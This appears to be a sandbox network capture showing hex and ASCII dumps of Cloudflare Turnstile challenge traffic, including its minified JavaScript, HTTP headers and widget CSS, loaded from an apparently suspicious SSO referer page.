2025-03-25 20:29:33 UTC	898	IN	Data Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 6a 74 28 65 2c 74 2c 61 2c 6f 2c 63 2c 6c 2c 76 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 6c 5d 28 76 29 2c 73 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 61 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 74 28 73 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 73 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 71 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 74 2c 61 29 3b 66 75 6e 63 74 Data Ascii: "use strict";(function(){function jt(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);funct
2025-03-25 20:29:33 UTC	1369	IN	Data Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 49 72 28 65 2c 74 29 7b 76 61 72 20 61 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 74 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 6f 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 69 74 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 3d 74 21 3d 6e 75 Data Ascii: e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);t&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function it(e,t){return t=t!=nu
2025-03-25 20:29:33 UTC	1369	IN	Data Raw: 72 61 79 24 2f 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 6f 74 28 65 2c 74 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 7a 74 28 65 29 7c 7c 42 74 28 65 2c 74 29 7c 7c 58 74 28 65 2c 74 29 7c 7c 47 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 50 65 28 65 2c 74 29 7b 76 61 72 20 61 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30 Data Ascii: ray$/.test(a))return ot(e,t)}}function Ie(e,t){return zt(e)\|\|Bt(e,t)\|\|Xt(e,t)\|\|Gt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Pe(e,t){var a={label:0,sent:function(){if(l[0
2025-03-25 20:29:33 UTC	1369	IN	Data Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 51 74 3d 33 30 30 30 32 30 3b 76 61 72 20 57 65 3d 33 30 30 30 33 30 3b 76 61 72 20 55 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75 Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Qt=300020;var We=300030;var Ue=300031;var q;(fu
2025-03-25 20:29:33 UTC	1369	IN	Data Raw: 61 6e 75 61 6c 22 2c 65 2e 41 75 74 6f 3d 22 61 75 74 6f 22 7d 29 28 5a 7c 7c 28 5a 3d 7b 7d 29 29 3b 76 61 72 20 63 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 65 76 65 72 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 61 6e 75 61 6c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 75 74 6f 3d 22 61 75 74 6f 22 7d 29 28 63 65 7c 7c 28 63 65 3d 7b 7d 29 29 3b 76 61 72 20 51 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 6c 77 61 79 73 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 78 65 63 75 74 65 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 6e 74 65 72 61 63 74 69 6f 6e 4f 6e 6c 79 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 51 7c 7c 28 51 3d 7b 7d 29 29 3b 76 61 72 20 6d 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 52 65 6e 64 65 72 3d 22 72 Data Ascii: anual",e.Auto="auto"})(Z\|\|(Z={}));var ce;(function(e){e.Never="never",e.Manual="manual",e.Auto="auto"})(ce\|\|(ce={}));var Q;(function(e){e.Always="always",e.Execute="execute",e.InteractionOnly="interaction-only"})(Q\|\|(Q={}));var me;(function(e){e.Render="r
2025-03-25 20:29:33 UTC	1369	IN	Data Raw: 74 69 6f 6e 20 70 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 4d 2e 4e 6f 72 6d 61 6c 2c 4d 2e 43 6f 6d 70 61 63 74 2c 4d 2e 49 6e 76 69 73 69 62 6c 65 2c 4d 2e 46 6c 65 78 69 62 6c 65 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 76 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 22 61 75 74 6f 22 2c 22 6d 61 6e 75 61 6c 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 22 61 75 74 6f 22 2c 22 6d 61 6e 75 61 6c 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 76 61 72 20 4e 72 3d 2f 5e 5b 61 2d 7a 5d 7b 32 2c 33 7d 28 5b 2d 5f 5d 5b 61 2d 7a 5d 7b 32 7d 29 3f 24 2f 69 3b 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 22 61 75 74 6f 22 7c 7c 4e 72 2e 74 65 73 74 28 65 29 Data Ascii: tion pt(e){return L([M.Normal,M.Compact,M.Invisible,M.Flexible],e)}function vt(e){return L(["auto","manual","never"],e)}function mt(e){return L(["auto","manual","never"],e)}var Nr=/^[a-z]{2,3}([-_][a-z]{2})?$/i;function gt(e){return e==="auto"\|\|Nr.test(e)
2025-03-25 20:29:33 UTC	1369	IN	Data Raw: 22 72 6f 2d 72 6f 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 54 74 28 65 2c 74 29 7b 76 61 72 20 61 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 22 3b 69 66 28 74 29 7b 76 61 72 20 6f 3b 61 3d 28 6f 3d 65 5b 22 62 61 73 65 2d 75 72 6c 22 5d 29 21 3d 3d 6e 75 6c 6c 26 26 6f 21 3d 3d 76 6f 69 64 20 30 3f 6f 3a 61 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 65 2c 74 2c 61 2c 6f 2c 63 2c 6c 2c 76 2c 68 29 7b 76 61 72 20 73 3d 54 74 28 61 2c 63 29 2c 70 3d 6c 3f 22 68 2f 22 2e 63 6f 6e 63 61 74 28 6c 2c 22 2f 22 29 3a 22 22 2c 5f 3d 68 3f 22 3f 22 2e 63 6f 6e 63 61 74 28 68 29 3a 22 22 2c 41 3d 61 5b 22 66 65 65 64 62 61 63 6b 2d 65 6e 61 62 6c 65 64 22 5d 3d 3d 3d 21 31 3f 22 66 62 44 Data Ascii: "ro-ro"];function Tt(e,t){var a="https://challenges.cloudflare.com";if(t){var o;a=(o=e["base-url"])!==null&&o!==void 0?o:a}return a}function Rt(e,t,a,o,c,l,v,h){var s=Tt(a,c),p=l?"h/".concat(l,"/"):"",_=h?"?".concat(h):"",A=a["feedback-enabled"]===!1?"fbD
2025-03-25 20:29:33 UTC	1369	IN	Data Raw: 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 7c 7c 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 72 65 74 75 72 6e 20 6f 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 63 2c 6f 7d 2c 65 65 28 65 2c 74 29 7d 66 75 6e 63 74 69 6f 6e 20 75 72 28 65 2c 74 29 7b 69 66 28 74 79 70 65 6f 66 20 74 21 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 21 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 77 72 69 74 Data Ascii: .setPrototypeOf\|\|function(o,c){return o.__proto__=c,o},ee(e,t)}function ur(e,t){if(typeof t!="function"&&t!==null)throw new TypeError("Super expression must either be null or a function");e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,writ
2025-03-25 20:29:33 UTC	1369	IN	Data Raw: 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 65 65 28 63 2c 6f 29 7d 2c 47 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 73 72 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 26 26 28 46 28 74 29 3d 3d 3d 22 6f 62 6a 65 63 74 22 7c 7c 74 79 70 65 6f 66 20 74 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 3f 74 3a 7a 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 64 72 28 65 29 7b 76 61 72 20 74 3d 42 65 28 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6f 3d 6c 65 28 65 29 2c 63 3b 69 66 28 74 29 7b 76 61 72 20 6c 3d 6c 65 28 74 68 69 73 29 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 63 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 6f 2c 61 72 67 75 6d 65 6e 74 73 2c 6c 29 7d 65 6c 73 65 20 63 3d 6f 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 Data Ascii: nfigurable:!0}}),ee(c,o)},Ge(e)}function sr(e,t){return t&&(F(t)==="object"\|\|typeof t=="function")?t:ze(e)}function dr(e){var t=Be();return function(){var o=le(e),c;if(t){var l=le(this).constructor;c=Reflect.construct(o,arguments,l)}else c=o.apply(this,ar
2025-03-25 20:29:33 UTC	1369	IN	Data Raw: 74 69 6f 6e 28 65 2c 74 2c 61 29 7b 76 61 72 20 6f 3d 54 74 28 74 2e 70 61 72 61 6d 73 2c 21 31 29 2c 63 3d 22 68 2f 22 2e 63 6f 6e 63 61 74 28 22 62 22 2c 22 2f 22 29 2c 6c 2c 76 2c 68 3d 22 22 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 22 29 2e 63 6f 6e 63 61 74 28 63 2c 22 66 65 65 64 62 61 63 6b 2d 72 65 70 6f 72 74 73 2f 22 29 2e 63 6f 6e 63 61 74 28 58 65 28 65 29 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 74 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 28 76 3d 74 2e 70 61 72 61 6d 73 2e 74 68 65 6d 65 29 21 3d 3d 6e 75 6c 6c 26 26 76 21 3d 3d 76 6f 69 64 20 30 3f 76 3a 74 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 61 29 3b Data Ascii: tion(e,t,a){var o=Tt(t.params,!1),c="h/".concat("b","/"),l,v,h="".concat(o,"/cdn-cgi/challenge-platform/").concat(c,"feedback-reports/").concat(Xe(e),"/").concat(t.displayLanguage,"/").concat((v=t.params.theme)!==null&&v!==void 0?v:t.theme,"/").concat(a);

Timestamp	Bytes transferred	Direction	Data
2025-03-25 20:29:33 UTC	851	OUT	GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/enwsv/0x4AAAAAABBaK7aSfnN9RzmT/auto/fbE/new/normal/auto/ HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: iframe Sec-Fetch-Storage-Access: active Referer: https://sso.ninerscorretora.com.br/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 20:29:33 UTC	1297	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 20:29:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 28125 Connection: close cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() content-security-policy: default-src 'none'; script-src 'nonce-MCDc5vH7MAyTcbV6' 'unsafe-eval'; script-src-attr 'none'; worker-src blob:; style-src 'unsafe-inline'; img-src 'self'; connect-src 'self'; frame-src 'self' blob:; child-src 'self' blob:; form-action 'none'; base-uri 'self'; sandbox allow-same-origin allow-scripts allow-popups allow-forms cross-origin-embedder-policy: require-corp cross-origin-opener-policy: same-origin cross-origin-resource-policy: cross-origin origin-agent-cluster: ?1 accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
2025-03-25 20:29:33 UTC	411	IN	Data Raw: 63 72 69 74 69 63 61 6c 2d 63 68 3a 20 53 65 63 2d 43 48 2d 55 41 2d 42 69 74 6e 65 73 73 2c 20 53 65 63 2d 43 48 2d 55 41 2d 41 72 63 68 2c 20 53 65 63 2d 43 48 2d 55 41 2d 4d 6f 62 69 6c 65 2c 20 53 65 63 2d 43 48 2d 55 41 2d 4d 6f 64 65 6c 2c 20 53 65 63 2d 43 48 2d 55 41 2d 50 6c 61 74 66 6f 72 6d 2d 56 65 72 73 69 6f 6e 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 75 6c 6c 2d 56 65 72 73 69 6f 6e 2d 4c 69 73 74 2c 20 53 65 63 2d 43 48 2d 55 41 2d 50 6c 61 74 66 6f 72 6d 2c 20 53 65 63 2d 43 48 2d 55 41 2c 20 55 41 2d 42 69 74 6e 65 73 73 2c 20 55 41 2d 41 72 63 68 2c 20 55 41 2d 46 75 6c 6c 2d 56 65 72 73 69 6f 6e 2c 20 55 41 2d 4d 6f 62 69 6c 65 2c 20 55 41 2d 4d 6f 64 65 6c 2c 20 55 41 2d 50 6c 61 74 66 6f 72 6d 2d 56 65 72 73 69 6f 6e 2c 20 55 41 2d 50 Data Ascii: critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-P
2025-03-25 20:29:33 UTC	1030	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 26 23 78 32 37 3b 6e 6f 6e 65 26 23 78 32 37 3b 3b 20 73 63 72 69 70 74 2d 73 72 63 20 26 23 78 32 37 3b 6e 6f 6e 63 65 2d 4d 43 44 63 35 76 48 37 4d 41 79 54 63 62 56 36 26 23 78 32 37 3b 20 26 23 78 32 37 3b 75 6e 73 61 66 65 2d Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="x-ua-compatible" content="IE=Edge,chrome=1"> <meta http-equiv="content-security-policy" content="default-src 'none'; script-src 'nonce-MCDc5vH7MAyTcbV6' 'unsafe-
2025-03-25 20:29:33 UTC	1369	IN	Data Raw: 6d 65 73 20 66 69 6c 6c 66 61 69 6c 7b 74 6f 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 33 30 70 78 20 30 20 30 20 23 64 65 31 33 30 33 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 69 6c 6c 66 61 69 6c 2d 6f 66 66 6c 61 62 65 6c 7b 74 6f 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 30 20 30 20 33 30 70 78 20 23 32 33 32 33 32 33 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 69 6c 6c 66 61 69 6c 2d 6f 66 66 6c 61 62 65 6c 2d 64 61 72 6b 7b 74 6f 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 30 20 30 20 33 30 70 78 20 23 66 66 66 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 73 63 61 6c 65 2d 75 70 2d 63 65 6e 74 65 72 7b 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 2e 30 31 29 7d 74 6f 7b 74 72 61 6e 73 66 6f 72 Data Ascii: mes fillfail{to{box-shadow:inset 0 30px 0 0 #de1303}}@keyframes fillfail-offlabel{to{box-shadow:inset 0 0 0 30px #232323}}@keyframes fillfail-offlabel-dark{to{box-shadow:inset 0 0 0 30px #fff}}@keyframes scale-up-center{0%{transform:scale(.01)}to{transfor
2025-03-25 20:29:33 UTC	1369	IN	Data Raw: 61 6c 69 67 6e 3a 72 69 67 68 74 7d 23 6f 76 65 72 72 75 6e 2d 69 2c 23 73 70 69 6e 6e 65 72 2d 69 7b 61 6e 69 6d 61 74 69 6f 6e 3a 73 70 69 6e 20 35 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 68 65 69 67 68 74 3a 33 30 70 78 3b 77 69 64 74 68 3a 33 30 70 78 7d 23 66 61 69 6c 2d 69 7b 61 6e 69 6d 61 74 69 6f 6e 3a 73 63 61 6c 65 2d 75 70 2d 63 65 6e 74 65 72 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 35 35 2c 2e 30 38 35 2c 2e 36 38 2c 2e 35 33 29 20 62 6f 74 68 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 30 20 30 20 23 64 65 31 33 30 33 7d 23 66 61 69 6c 2d 69 2c 23 73 75 63 63 65 73 73 2d 69 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 64 69 73 70 6c 61 79 3a 66 Data Ascii: align:right}#overrun-i,#spinner-i{animation:spin 5s linear infinite;display:flex;height:30px;width:30px}#fail-i{animation:scale-up-center .6s cubic-bezier(.55,.085,.68,.53) both;box-shadow:inset 0 0 0 #de1303}#fail-i,#success-i{border-radius:50%;display:f
2025-03-25 20:29:33 UTC	1369	IN	Data Raw: 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 30 20 30 20 23 30 61 61 39 33 37 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 3a 23 30 61 61 39 33 37 3b 66 69 6c 6c 3a 23 30 61 61 39 33 37 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 65 78 70 69 72 65 64 2d 63 69 72 63 6c 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 74 69 6d 65 6f 75 74 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 39 39 39 3b 66 69 6c 6c 3a 23 39 39 39 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 65 78 70 Data Ascii: hadow:inset 0 0 0 #0aa937}.theme-dark .success-circle{stroke:#0aa937;fill:#0aa937}.theme-dark .expired-circle,.theme-dark .timeout-circle{stroke-dasharray:166;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#999;fill:#999}.theme-dark #exp
2025-03-25 20:29:33 UTC	1369	IN	Data Raw: 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 68 31 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 7b 63 6f 6c 6f 72 3a 23 66 66 61 32 39 39 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 61 63 74 69 76 65 2c Data Ascii: }.theme-dark h1{color:#fff}.theme-dark #challenge-error-title{color:#ffa299}.theme-dark #challenge-error-title a,.theme-dark #challenge-error-title a:link,.theme-dark #challenge-error-title a:visited{color:#bbb}.theme-dark #challenge-error-title a:active,
2025-03-25 20:29:33 UTC	1369	IN	Data Raw: 65 73 68 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 74 69 6d 65 6f 75 74 2d 72 65 66 72 65 73 68 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 74 69 6d 65 6f 75 74 2d 72 65 66 72 65 73 68 2d 6c 69 6e 6b 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6f 76 65 72 6c 61 79 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 66 66 61 32 39 39 3b 63 6f 6c 6f 72 3a 23 66 66 61 32 39 39 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 20 61 3a 6c 69 6e 6b Data Ascii: esh-link:active,.theme-dark #timeout-refresh-link:focus,.theme-dark #timeout-refresh-link:hover{color:#949494}.theme-dark .overlay{border-color:#ffa299;color:#ffa299}.theme-dark .error-message,.theme-dark .error-message a,.theme-dark .error-message a:link
2025-03-25 20:29:33 UTC	1369	IN	Data Raw: 3a 63 68 65 63 6b 65 64 7e 2e 63 62 2d 69 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 6f 70 61 63 69 74 79 3a 31 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 20 73 63 61 6c 65 28 31 29 7d 2e 63 62 2d 6c 62 20 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 7e 2e 63 62 2d 69 3a 61 66 74 65 72 7b 62 6f 72 64 65 72 3a 73 6f 6c 69 64 20 23 63 34 34 64 30 65 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 3b 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 30 20 34 70 78 20 34 70 78 20 30 3b 68 65 69 67 68 74 3a 31 32 70 78 3b 6c 65 66 74 3a 35 70 78 3b 74 6f 70 3a 30 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 34 35 64 65 67 29 20 73 63 61 6c 65 28 31 29 3b 77 69 64 Data Ascii: :checked~.cb-i{background-color:#fff;border-radius:5px;opacity:1;transform:rotate(0deg) scale(1)}.cb-lb input:checked~.cb-i:after{border:solid #c44d0e;border-radius:0;border-width:0 4px 4px 0;height:12px;left:5px;top:0;transform:rotate(45deg) scale(1);wid
